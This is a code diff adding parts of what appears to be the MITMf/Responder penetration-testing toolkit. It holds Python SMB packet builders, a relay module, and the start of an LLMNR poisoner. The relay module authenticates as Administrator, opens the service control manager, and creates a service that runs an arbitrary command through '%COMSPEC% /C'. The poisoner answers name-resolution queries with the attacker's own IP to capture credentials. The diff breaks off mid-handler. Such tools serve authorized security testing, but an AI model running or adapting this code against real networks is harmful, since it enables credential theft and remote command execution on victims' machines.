+        ("sessionkey", "\x00\x00\x00\x00"),
+        ("PasswordLen","\x18\x00"),
+        ("reserved2","\x00\x00\x00\x00"),
+        ("bcc","\x3b\x00"),
+        ("AccountPassword",""),
+        ("AccountName",""),
+        ("AccountNameTerminator","\x00"),
+        ("PrimaryDomain","WORKGROUP"),
+        ("PrimaryDomainTerminator","\x00"),
+        ("NativeOs","Unix"),
+        ("NativeOsTerminator","\x00"),
+        ("NativeLanman","Samba"),
+        ("NativeLanmanTerminator","\x00"),
+
+    ])
+    def calculate(self): 
+        CompleteBCC = str(self.fields["AccountPassword"])+str(self.fields["AccountName"])+str(self.fields["AccountNameTerminator"])+str(self.fields["PrimaryDomain"])+str(self.fields["PrimaryDomainTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLanman"])+str(self.fields["NativeLanmanTerminator"])
+        self.fields["bcc"] = struct.pack("<h", len(CompleteBCC))
+        self.fields["PasswordLen"] = struct.pack("<h", len(str(self.fields["AccountPassword"])))
+
+class SMBTreeConnectData(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x04"),
+        ("AndXCommand", "\xff"),
+        ("Reserved","\x00" ),
+        ("Andxoffset", "\x00\x00"),
+        ("Flags","\x08\x00"),
+        ("PasswdLen", "\x01\x00"),
+        ("Bcc","\x1b\x00"),
+        ("Passwd", "\x00"),
+        ("Path",""),
+        ("PathTerminator","\x00"),
+        ("Service","?????"),
+        ("Terminator", "\x00"),
+
+    ])
+    def calculate(self): 
+        self.fields["PasswdLen"] = struct.pack("<h", len(str(self.fields["Passwd"])))[:2]
+        BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
+        self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
+
+class RAPNetServerEnum3Data(Packet):
+    fields = OrderedDict([
+        ("Command", "\xd7\x00"),
+        ("ParamDescriptor", "WrLehDzz"),
+        ("ParamDescriptorTerminator", "\x00"),
+        ("ReturnDescriptor","B16BBDz"),
+        ("ReturnDescriptorTerminator", "\x00"),
+        ("DetailLevel", "\x01\x00"),
+        ("RecvBuff","\xff\xff"),
+        ("ServerType", "\x00\x00\x00\x80"),
+        ("TargetDomain","SMB"),
+        ("RapTerminator","\x00"),
+        ("TargetName","ABCD"),
+        ("RapTerminator2","\x00"),
+    ])
+
+class SMBTransRAPData(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x0e"),
+        ("TotalParamCount", "\x24\x00"),
+        ("TotalDataCount","\x00\x00" ),
+        ("MaxParamCount", "\x08\x00"),
+        ("MaxDataCount","\xff\xff"),
+        ("MaxSetupCount", "\x00"),
+        ("Reserved","\x00\x00"),
+        ("Flags", "\x00"),
+        ("Timeout","\x00\x00\x00\x00"),
+        ("Reserved1","\x00\x00"),
+        ("ParamCount","\x24\x00"),
+        ("ParamOffset", "\x5a\x00"),
+        ("DataCount", "\x00\x00"),
+        ("DataOffset", "\x7e\x00"),
+        ("SetupCount", "\x00"),
+        ("Reserved2", "\x00"),
+        ("Bcc", "\x3f\x00"),
+        ("Terminator", "\x00"),
+        ("PipeName", "\\PIPE\\LANMAN"),
+        ("PipeTerminator","\x00\x00"),
+        ("Data", ""),
+
+    ])
+    def calculate(self):
+        #Padding
+        if len(str(self.fields["Data"]))%2==0:
+           self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
+        else:
+           self.fields["PipeTerminator"] = "\x00\x00\x00"
+        ##Convert Path to Unicode first before any Len calc.
+        self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
+        ##Data Len
+        self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
+        self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
+        ##Packet len
+        FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
+
+        self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
+        ##Bcc Buff Len
+        BccComplete    = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
+        self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]

core/responder/fingerprinter/RelayPackets.py

@@ -0,0 +1,480 @@
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+##################################################################################
+#SMB Client Stuff
+##################################################################################
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x00"),
+        ("flag2", "\x00\x00"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x00\x4e"),
+        ("uid", "\x00\x08"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNego(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x00"),
+        ("Bcc", "\x62\x00"),
+        ("Data", "")
+    ])
+    
+    def calculate(self):
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBNegoData(Packet):
+    fields = OrderedDict([
+        ("Separator1","\x02" ),
+        ("Dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
+        ("Separator2","\x02"),
+        ("Dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
+        ("Separator3","\x02"),
+        ("Dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
+        ("Separator4","\x02"),
+        ("Dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
+        ("Separator5","\x02"),
+        ("Dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
+        ("Separator6","\x02"),
+        ("Dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
+    ])
+
+class SMBSessionTreeData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",   "\x0d"),
+        ("AndXCommand", "\x75"),
+        ("Reserved",    "\x00" ),
+        ("Andxoffset", "\x7c\x00"),
+        ("Maxbuff","\x04\x11"),
+        ("Maxmpx", "\x32\x00"),
+        ("Vcnum","\x00\x00"),
+        ("Sessionkey", "\x00\x00\x00\x00"),
+        ("AnsiPassLength","\x18\x00"),
+        ("UnicodePassLength", "\x00\x00"),
+        ("Reserved2","\x00\x00\x00\x00"),
+        ("Capabilities", "\xd4\x00\x00\x00"),
+        ("Bcc","\x3f\x00"),   
+        ("AnsiPasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
+        ("UnicodePasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
+        ("Username","Administrator"),
+        ("UsernameTerminator","\x00\x00"),
+        ("Domain","SMB"),
+        ("DomainTerminator","\x00\x00"),
+        ("Nativeos",""),
+        ("NativeosTerminator","\x00\x00"),
+        ("Lanmanager",""),
+        ("LanmanagerTerminator","\x00\x00\x00"),
+        ("Wordcount2","\x04"),
+        ("Andxcmd2","\xff"),
+        ("Reserved3","\x00"),
+        ("Andxoffset2","\x06\x01"),
+        ("Flags","\x08\x00"),
+        ("PasswordLength","\x01\x00"),
+        ("Bcc2","\x19\x00"),
+        ("Passwd","\x00"),
+        ("PrePath","\\\\"),
+        ("Targ", "CSCDSFCS"),
+        ("IPC", "\\IPC$"),
+        ("TerminatorPath","\x00\x00"),
+        ("Service","?????"),
+        ("TerminatorService","\x00"),
+    ])
+    def calculate(self):
+        ##Convert first
+        self.fields["Username"] = self.fields["Username"].encode('utf-16be')
+        self.fields["Domain"] = self.fields["Domain"].encode('utf-16be')
+        self.fields["Nativeos"] = self.fields["Nativeos"].encode('utf-16be')
+        self.fields["Lanmanager"] = self.fields["Lanmanager"].encode('utf-16be')
+        self.fields["PrePath"] = self.fields["PrePath"].encode('utf-16le')
+        self.fields["Targ"] = self.fields["Targ"].encode('utf-16le')
+        self.fields["IPC"] = self.fields["IPC"].encode('utf-16le')
+        ##Then calculate
+        data1= str(self.fields["AnsiPasswd"])+(self.fields["UnicodePasswd"])+str(self.fields["Username"])+str(self.fields["UsernameTerminator"])+str(self.fields["Domain"])+str(self.fields["DomainTerminator"])+str(self.fields["Nativeos"])+str(self.fields["NativeosTerminator"])+str(self.fields["Lanmanager"])+str(self.fields["LanmanagerTerminator"])
+
+        data2= str(self.fields["Passwd"])+str(self.fields["PrePath"])+str(self.fields["Targ"])+str(self.fields["IPC"])+str(self.fields["TerminatorPath"])+str(self.fields["Service"])+str(self.fields["TerminatorService"])
+
+        self.fields["Bcc"] = struct.pack("<h",len(data1))
+        self.fields["Bcc2"] = struct.pack("<h",len(data2))
+        self.fields["Andxoffset"] = struct.pack("<h",len(data1)+32+29)
+        self.fields["AnsiPassLength"] = struct.pack("<h",len(str(self.fields["AnsiPasswd"])))
+        self.fields["UnicodePassLength"] = struct.pack("<h",len(str(self.fields["UnicodePasswd"])))
+        self.fields["PasswordLength"] = struct.pack("<h",len(str(self.fields["Passwd"])))
+
+class SMBNTCreateData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",     "\x18"),
+        ("AndXCommand",   "\xff"),
+        ("Reserved",      "\x00" ),
+        ("Andxoffset",    "\x00\x00"),
+        ("Reserved2",     "\x00"),
+        ("FileNameLen",   "\x07\x00"),
+        ("CreateFlags",   "\x16\x00\x00\x00"),
+        ("RootFID",       "\x00\x00\x00\x00"),
+        ("AccessMask",    "\x00\x00\x00\x02"),
+        ("AllocSize",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("FileAttrib",    "\x00\x00\x00\x00"),
+        ("ShareAccess",   "\x07\x00\x00\x00"),
+        ("Disposition",   "\x01\x00\x00\x00"),   
+        ("CreateOptions", "\x00\x00\x00\x00"),
+        ("Impersonation", "\x02\x00\x00\x00"),
+        ("SecurityFlags", "\x00"),
+        ("Bcc",           "\x08\x00"),
+        ("FileName",      "\\svcctl"),
+        ("FileNameNull",  "\x00"),
+    ])
+
+    def calculate(self):
+
+        Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
+        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
+        self.fields["Bcc"] = struct.pack("<h",len(Data1))
+
+class SMBReadData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",     "\x0a"),
+        ("AndXCommand",   "\xff"),
+        ("Reserved",      "\x00" ),
+        ("Andxoffset",    "\x00\x00"),
+        ("FID",           "\x00\x00"),
+        ("Offset",        "\x19\x03\x00\x00"), 
+        ("MaxCountLow",   "\xed\x01"),
+        ("MinCount",      "\xed\x01"),
+        ("Hidden",        "\xff\xff\xff\xff"),
+        ("Remaining",     "\x00\x00"),  
+        ("Bcc",           "\x00\x00"),
+        ("Data", ""),
+    ])
+
+    def calculate(self):
+
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBWriteData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",     "\x0e"),
+        ("AndXCommand",   "\xff"),
+        ("Reserved",      "\x00" ),
+        ("Andxoffset",    "\x00\x00"),
+        ("FID",           "\x06\x40"),
+        ("Offset",        "\xea\x03\x00\x00"),
+        ("Reserved2",     "\xff\xff\xff\xff"),
+        ("WriteMode",     "\x08\x00"),
+        ("Remaining",     "\xdc\x02"),
+        ("DataLenHi",     "\x00\x00"),
+        ("DataLenLow",    "\xdc\x02"),
+        ("DataOffset",    "\x3f\x00"),
+        ("HiOffset",      "\x00\x00\x00\x00"),   
+        ("Bcc",           "\xdc\x02"),
+        ("Data", ""),
+    ])
+
+    def calculate(self):
+        self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
+        self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBDCEData(Packet):
+    fields = OrderedDict([
+        ("Version",       "\x05"),
+        ("VersionLow",    "\x00"),
+        ("PacketType",    "\x0b"),
+        ("PacketFlag",    "\x03"),
+        ("DataRepresent", "\x10\x00\x00\x00"),
+        ("FragLen",       "\x2c\x02"),
+        ("AuthLen",       "\x00\x00"),
+        ("CallID",        "\x00\x00\x00\x00"),
+        ("MaxTransFrag",  "\xd0\x16"),
+        ("MaxRecvFrag",   "\xd0\x16"),
+        ("GroupAssoc",    "\x00\x00\x00\x00"),
+        ("CTXNumber",     "\x01"),
+        ("CTXPadding",    "\x00\x00\x00"),
+        ("CTX0ContextID",  "\x00\x00"),
+        ("CTX0ItemNumber", "\x01\x00"),
+        ("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
+        ("CTX0UIDVersion", "\x02\x00"),
+        ("CTX0UIDVersionlo","\x00\x00"),
+        ("CTX0UIDSyntax",   "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
+        ("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
+    ])
+
+    def calculate(self):
+
+        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
+
+
+        self.fields["FragLen"] = struct.pack("<h",len(Data1))
+
+class SMBDCEPacketData(Packet):
+    fields = OrderedDict([
+        ("Version",       "\x05"),
+        ("VersionLow",    "\x00"),
+        ("PacketType",    "\x00"),
+        ("PacketFlag",    "\x03"),
+        ("DataRepresent", "\x10\x00\x00\x00"),
+        ("FragLen",       "\x2c\x02"),
+        ("AuthLen",       "\x00\x00"),
+        ("CallID",        "\x00\x00\x00\x00"),
+        ("AllocHint",     "\x38\x00\x00\x00"),
+        ("ContextID",     "\x00\x00"),
+        ("Opnum",         "\x0f\x00"),
+        ("Data",          ""),
+
+    ])
+
+    def calculate(self):
+
+        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
+
+        self.fields["FragLen"] = struct.pack("<h",len(Data1))
+        self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
+
+class SMBDCESVCCTLOpenManagerW(Packet):
+    fields = OrderedDict([
+        ("MachineNameRefID",     "\xb5\x97\xb9\xbc"),
+        ("MaxCount",             "\x0f\x00\x00\x00"),
+        ("Offset",               "\x00\x00\x00\x00"),
+        ("ActualCount",          "\x0f\x00\x00\x00"),
+        ("MachineName",          "\\\\169.220.1.11"),##This is not taken into consideration.
+        ("MachineNameNull",      "\x00\x00\x00\x00"),
+        ("DbPointer",            "\x00\x00\x00\x00"),
+        ("AccessMask",           "\x3f\x00\x0f\x00"),
+    ])
+
+    def calculate(self):
+        ## Convert to UTF-16LE
+        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
+
+
+class SMBDCESVCCTLCreateService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+        ("MaxCount",             "\x0c\x00\x00\x00"),
+        ("Offset",               "\x00\x00\x00\x00"),
+        ("ActualCount",          "\x0c\x00\x00\x00"),
+        ("ServiceName",          "AyAGaxwLhCP"),
+        ("MachineNameNull",      "\x00\x00"),
+        ("ReferentID",           "\x9c\xfa\x9a\xc9"),
+        ("MaxCountRefID",        "\x11\x00\x00\x00"),
+        ("OffsetID",             "\x00\x00\x00\x00"),
+        ("ActualCountRefID",     "\x11\x00\x00\x00"),
+        ("DisplayNameID",        "DhhUFcsvrfJvLwRq"),
+        ("DisplayNameIDNull",    "\x00\x00\x00\x00"),
+        ("AccessMask",           "\xff\x01\x0f\x00"),
+        ("ServerType",           "\x10\x01\x00\x00"),
+        ("ServiceStartType",     "\x03\x00\x00\x00"),
+        ("ServiceErrorCtl",      "\x00\x00\x00\x00"),
+        ("BinPathMaxCount",      "\xb6\x00\x00\x00"),
+        ("BinPathOffset",        "\x00\x00\x00\x00"),
+        ("BinPathActualCount",   "\xb6\x00\x00\x00"),
+        ("BinPathName",          "%COMSPEC% /C \""),
+        ("BinCMD",               ""),
+        ("BintoEnd",             "\""),
+        ("BinPathNameNull",      "\x00\x00"),
+        ("Nullz",                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
+    ])
+
+    def calculate(self):
+
+        BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
+
+        ## Calculate first
+        self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
+        self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
+        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
+        self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
+        ## Then convert to UTF-16LE, yeah it's weird..
+        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
+        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
+        self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
+        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
+        self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
+
+
+
+class SMBDCESVCCTLOpenService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+        ("MaxCount",             "\x0c\x00\x00\x00"),
+        ("Offset",               "\x00\x00\x00\x00"),
+        ("ActualCount",          "\x0c\x00\x00\x00"),
+        ("ServiceName",          ""),
+        ("MachineNameNull",      "\x00\x00"),
+        ("AccessMask",           "\xff\x01\x0f\x00"),
+    ])
+
+    def calculate(self):
+        ## Calculate first
+        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        ## Then convert to UTF-16LE, yeah it's weird..
+        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
+
+class SMBDCESVCCTLStartService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+        ("MaxCount",             "\x00\x00\x00\x00\x00\x00\x00\x00"),
+    ])
+
+def ParseAnswerKey(data,host):
+    key = data[73:81]
+    print "Key retrieved is:%s from host:%s"%(key.encode("hex"),host)
+    return key
+
+##################################################################################
+#SMB Server Stuff
+##################################################################################
+
+#Calculate total SMB packet len.
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+#Set MID SMB Header field.
+def midcalc(data):
+    pack=data[34:36]
+    return pack
+
+#Set UID SMB Header field.
+def uidcalc(data):
+    pack=data[32:34]
+    return pack
+
+#Set PID SMB Header field.
+def pidcalc(data):
+    pack=data[30:32]
+    return pack
+
+#Set TID SMB Header field.
+def tidcalc(data):
+    pack=data[28:30]
+    return pack
+
+#SMB Header answer packet.
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("errorcode", "\x00\x00\x00\x00" ),
+        ("flag1", "\x80"),
+        ("flag2", "\x00\x00"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\xff\xfe"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+#SMB Negotiate Answer packet.
+class SMBNegoAns(Packet):
+    fields = OrderedDict([
+        ("Wordcount",    "\x11"),
+        ("Dialect",      ""),
+        ("Securitymode", "\x03"),
+        ("MaxMpx",       "\x32\x00"),
+        ("MaxVc",        "\x01\x00"),
+        ("Maxbuffsize",  "\x04\x11\x00\x00"),
+        ("Maxrawbuff",   "\x00\x00\x01\x00"),
+        ("Sessionkey",   "\x00\x00\x00\x00"),
+        ("Capabilities", "\xfd\x43\x00\x00"),
+        ("Systemtime",   "\xc2\x74\xf2\x53\x70\x02\xcf\x01\x2c\x01"),
+        ("Keylength",    "\x08"),
+        ("Bcc",          "\x10\x00"),
+        ("Key",          "\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"),
+        ("Domain",       ""),
+
+    ])
+
+    def calculate(self):
+
+        ##Then calculate.
+        CompleteBCCLen =  str(self.fields["Key"])+str(self.fields["Domain"])
+        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
+        self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
+
+# SMB Session/Tree Answer.
+class SMBSessTreeAns(Packet):
+    fields = OrderedDict([
+        ("Wordcount",       "\x03"),
+        ("Command",         "\x75"), 
+        ("Reserved",        "\x00"),
+        ("AndXoffset",      "\x4e\x00"),
+        ("Action",          "\x01\x00"),
+        ("Bcc",             "\x25\x00"),
+        ("NativeOs",        "Windows 5.1"),
+        ("NativeOsNull",    "\x00"),
+        ("NativeLan",       "Windows 2000 LAN Manager"),
+        ("NativeLanNull",   "\x00"),
+        ("WordcountTree",   "\x03"),
+        ("AndXCommand",     "\xff"),
+        ("Reserved1",       "\x00"),
+        ("AndxOffset",      "\x00\x00"),
+        ("OptionalSupport", "\x01\x00"),
+        ("Bcc2",            "\x08\x00"),
+        ("Service",         "A:"),
+        ("ServiceNull",     "\x00"),
+        ("FileSystem",      "NTFS"),
+        ("FileSystemNull",  "\x00"),
+
+    ])
+
+    def calculate(self):
+        ##AndxOffset
+        CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
+
+        self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]#SMB Header is *always* 32.
+        ##BCC 1 and 2
+        CompleteBCCLen =  str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
+        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
+        CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
+        self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))
+
+class SMBSessEmpty(Packet):
+    fields = OrderedDict([
+        ("Empty",       "\x00\x00\x00"),
+    ])
+

core/responder/llmnr/LLMNRPoisoner.py

@@ -0,0 +1,187 @@
+#! /usr/bin/env python2.7
+
+import socket
+import threading
+import struct
+import logging
+
+from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+from core.configwatcher import ConfigWatcher
+from core.responder.fingerprinter.Fingerprint import RunSmbFinger
+from core.responder.packet import Packet
+from core.responder.odict import OrderedDict
+from core.responder.common import *
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class LLMNRPoisoner:
+
+	def start(self, options, ourip):
+
+		global args; args = options #For now a quick hack to make argparse's namespace object available to all
+		global OURIP ; OURIP = ourip  #and our ip address
+
+		try:
+			mitmf_logger.debug("[LLMNRPoisoner] OURIP => {}".format(OURIP))
+			server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR)
+			t = threading.Thread(name="LLMNR", target=server.serve_forever) #LLMNR
+			t.setDaemon(True)
+			t.start()
+		except Exception, e:
+			mitmf_logger.error("[LLMNRPoisoner] Error starting on port {}: {}:".format(5355, e))
+
+class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		MADDR = "224.0.0.252"
+		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
+		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
+		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + socket.inet_aton(OURIP))
+
+		UDPServer.server_bind(self)
+
+#LLMNR Answer packet.
+class LLMNRAns(Packet):
+	fields = OrderedDict([
+		("Tid",              ""),
+		("Flags",            "\x80\x00"),
+		("Question",         "\x00\x01"),
+		("AnswerRRS",        "\x00\x01"),
+		("AuthorityRRS",     "\x00\x00"),
+		("AdditionalRRS",    "\x00\x00"),
+		("QuestionNameLen",  "\x09"),
+		("QuestionName",     ""),
+		("QuestionNameNull", "\x00"),
+		("Type",             "\x00\x01"),
+		("Class",            "\x00\x01"),
+		("AnswerNameLen",    "\x09"),
+		("AnswerName",       ""),
+		("AnswerNameNull",   "\x00"),
+		("Type1",            "\x00\x01"),
+		("Class1",           "\x00\x01"),
+		("TTL",              "\x00\x00\x00\x1e"),##Poison for 30 sec.
+		("IPLen",            "\x00\x04"),
+		("IP",               "\x00\x00\x00\x00"),
+	])
+
+	def calculate(self):
+		self.fields["IP"] = socket.inet_aton(OURIP)
+		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
+		self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
+		self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
+
+def Parse_LLMNR_Name(data):
+	NameLen = struct.unpack('>B',data[12])[0]
+	Name = data[13:13+NameLen]
+	return Name
+
+# LLMNR Server class.
+class LLMNR(BaseRequestHandler):
+
+	def handle(self):
+
+		ResponderConfig   = ConfigWatcher.getInstance().getConfig()['Responder']
+		DontRespondTo     = ResponderConfig['DontRespondTo']
+		DontRespondToName = ResponderConfig['DontRespondToName']
+		RespondTo         = ResponderConfig['RespondTo']
+		RespondToName     = ResponderConfig['RespondToName'] 
+
+		data, soc = self.request
+		try:
+			if data[2:4] == "\x00\x00":
+				if Parse_IPV6_Addr(data):
+					Name = Parse_LLMNR_Name(data)
+					if args.analyze:
+						if args.finger:
+							try:
+								Finger = RunSmbFinger((self.client_address[0],445))
+								mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1]))
+							except Exception:
+								mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name))
+						else:
+							mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name))
+
+					if DontRespondToSpecificHost(DontRespondTo):
+						if RespondToIPScope(DontRespondTo, self.client_address[0]):
+							return None
+
+					if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+						return None 
+
+					if RespondToSpecificHost(RespondTo):
+						if args.analyze == False:
